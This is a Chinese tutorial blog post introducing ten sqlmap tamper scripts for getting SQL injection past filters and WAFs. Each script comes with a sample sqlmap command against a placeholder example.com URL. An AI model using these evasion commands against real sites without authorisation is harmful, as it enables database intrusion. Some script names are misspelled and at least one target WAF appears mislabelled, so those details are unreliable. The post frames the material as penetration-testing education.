Sqlmap学习 -- Tamper绕过脚本

简介: Sqlmap学习 -- Tamper绕过脚本

在网络安全领域,SQL 注入是一种常见的攻击方式。SQLMap 是一款强大的工具,可用于检测和利用这种漏洞。然而,为了绕过各种安全机制和防御策略,攻击者会使用多种技术。本文将详细介绍 SQLMap 中的一些绕过脚本。

一、apostrophemadk.py:绕过单引号

该脚本用于绕过应用程序中对单引号的过滤。例如:

    sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemadk

    二、base64encode.py:使用 Base64 编码

    该脚本将注入字符串使用 Base64 编码,绕过部分检测。例如:

      sqlmap -u "http://example.com/page.php?id=1" --tamper=base64encode

      三、multiplespaces.py:多个空格绕过通过使用多个空格绕过过滤机制。例如:

        sqlmap -u "http://example.com/page.php?id=1" --tamper=multiplespaces

        四、space2plus.py:空格替换为加号

        将空格替换为加号,绕过一些过滤机制。例如:

          sqlmap -u "http://example.com/page.php?id=1" --tamper=space2plus

          五、nonrecursiverplacement.py:非递归替代

          这个脚本通过替换关键字的部分字符,绕过一些检测。例如:

            sqlmap -u "http://example.com/page.php?id=1" --tamper=nonrecursiverplacement

            六、space2randomblank.py:空格随机替换

            随机替换空格,增加检测难度。例如:

              sqlmap -u "http://example.com/page.php?id=1" --tamper=space2randomblank

              七、unionalltounion.py:替换 UNION ALL 为 UNION

              将 UNION ALL 替换为 UNION,绕过检测。例如:

                sqlmap -u "http://example.com/page.php?id=1" --tamper=unionalltounion

                八、securesphere.py:Barracuda WAF 绕过

                用于绕过 Barracuda WAF 的脚本。例如:

                  sqlmap -u "http://example.com/page.php?id=1" --tamper=securesphere

                  九、space2hash.py:空格替换为哈希

                  将空格替换为哈希字符。例如:

                    sqlmap -u "http://example.com/page.php?id=1" --tamper=space2hash

                    十、space2mssqlblank.py:空格替换为 MSSQL 注释

                    将空格替换为 MSSQL 注释,绕过过滤。例如:

                      sqlmap -u "http://example.com/page.php?id=1" --tamper=space2mssqlblank

                      总结:

                      绕过脚本是 SQL 注入领域中的重要策略,攻击者使用这些脚本来欺骗和绕过应用程序的安全机制。本文介绍了多种绕过脚本,并为每个脚本提供详细的使用方式和示例 payload。在进行渗透测试或安全评估时,了解这些脚本可以帮助你更好地理解攻击者的技术手段,从而提高应对能力。然而,请务必在合法授权的环境下使用这些技术,遵循法律和道德准则。

                      相关文章
                      |
                      SQL 测试技术 网络安全
                      [ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
                      [ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
                      1499 0
                      [ 渗透工具篇 ] sqlmap 详解(一) sqlmap 安装详解
                      |
                      2月前
                      |
                      SQL 安全 关系型数据库
                      sql注入原理和sqlmap命令的基础命令以及使用手法
                      sql注入原理和sqlmap命令的基础命令以及使用手法
                      |
                      3月前
                      |
                      SQL 安全 测试技术
                      Kali下Sqlmap工具使用方法之POST方法篇
                      Kali下Sqlmap工具使用方法之POST方法篇
                      90 0
                      |
                      3月前
                      |
                      SQL 安全 关系型数据库
                      KALI下Sqlmap工具使用方法之GET方法篇
                      KALI下Sqlmap工具使用方法之GET方法篇
                      106 0
                      |
                      5月前
                      |
                      SQL 安全 关系型数据库
                      使用SQLMap进行SQL注入测试
                      使用SQLMap进行SQL注入测试
                      |
                      6月前
                      |
                      SQL 数据库 关系型数据库
                      【SQL注入】 注入神器sqlmap的使用
                      数据库 SQL注入漏洞 sqlmap
                      222 2
                      |
                      7月前
                      |
                      SQL 测试技术 网络安全
                      Python之SQLMap:自动SQL注入和渗透测试工具示例详解
                      Python之SQLMap:自动SQL注入和渗透测试工具示例详解
                      726 0
                      |
                      关系型数据库 MySQL 数据库
                      Sqlmap学习 -- Tapmer绕过脚本(三)
                      Sqlmap学习 -- Tapmer绕过脚本(三)
                      190 0
                      |
                      SQL XML 安全
                      SQLMap注入工具
                      SQLMap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。
                      |
                      SQL 安全 数据库
                      sqlmap的基本使用方法
                      sqlmap的基本使用方法
                      378 0